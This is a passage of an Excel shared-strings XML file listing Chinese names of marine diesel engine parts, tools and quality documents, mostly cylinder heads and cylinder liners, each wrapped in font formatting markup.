        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概要图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆，示位器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑道安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆和推杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆滑环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆限位器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆形轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应传感器装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干清洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干涉继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TCS</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干油底壳的附件布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板切割计划</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板验收报告质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管，外直径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0-50</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢基础</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢琴线滚</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝吊扣</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝滚导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝滚</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝滚支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝滚总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝滚总成支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝条索六角帽螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖，侧视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖，俯视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖，仰视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖，液压套备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖，正视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套研磨机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖磁粉检验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊具测试规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊链测试规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊装工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖顶部，后侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖俯视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖焊接质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖精加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖冷却水套</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺母张紧规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺栓螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>俯视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖维修方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖液压拉伸圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖支撑工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖质量控制规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖铸件质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套半环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套拆卸高度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套吊索</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套吊装工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套额外工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套滚压生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套和冷却水套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套和冷却水套</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套横梁</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套滑油孔生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套及润滑系统工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水进水</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水预热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套磨损量点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套十字架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套十字梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套首次质量规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套完工检查质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套温度测量点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套性能要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
